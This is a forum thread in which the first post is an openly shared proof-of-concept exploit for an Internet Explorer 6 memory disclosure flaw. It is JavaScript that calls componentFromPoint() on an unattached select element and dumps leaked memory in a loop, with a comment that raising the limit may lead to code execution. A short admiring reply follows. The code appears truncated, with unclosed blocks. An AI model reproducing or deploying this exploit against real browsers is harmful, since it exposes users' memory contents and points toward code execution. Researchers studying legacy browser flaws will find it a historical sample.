Results 1 to 2 of 2

Thread: IE6 Memory Disclosure Exploit ..."vinnu" Share/Save - My123World.Com!

  1. #1

    IE6 Memory Disclosure Exploit ..."vinnu"

    Author : "vinnu"
    Team : Legion Of Xtremers
    Thanx : Secfence
    Greets : Lord Deathstorm, prashant, b0nd, 41.warrior, fb1h2s, godwin austin, neo, amol, umesh, anarki, the-empty, DZZ, webDevil and all g4h members, and whole security world.
    <title>IE 6 Memory disclosure exploit..."vinnu"</title>
    <div id="disc"></div>
    var limit = 8000;// Above it will crash and may lead to Code Execution.
    var did = document.getElementById("disc");
    function discl() {
    var buf="";
    var c="0000";
    var d=0x0000;
    /************************************************** **/
    var a=document.createElement("select");
    var b=a.componentFromPoint(0xff,0xff);
    /*** Vulnerable code. componentFromPoint() on an
    unmaterialised object leads to leaking in memory. ***/

    did.innerHTML+="<br>Object.length : "+b.length;
    for(var i=0;i<limit;i++) {
    d = b.charCodeAt(i).toString(16);
    did.innerHTML += buf;
    <input type=button value="Disclose" onclick="discl()" />
    Last edited by "vinnu"; 10-20-2011 at 04:42 PM.

  2. #2
    Garage Addict 41.w4r10r's Avatar
    Join Date
    Jul 2010
    Blog Entries
    aaah this is what you told me during the meet...
    awesome sirji...
    need to check and analyze it...

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts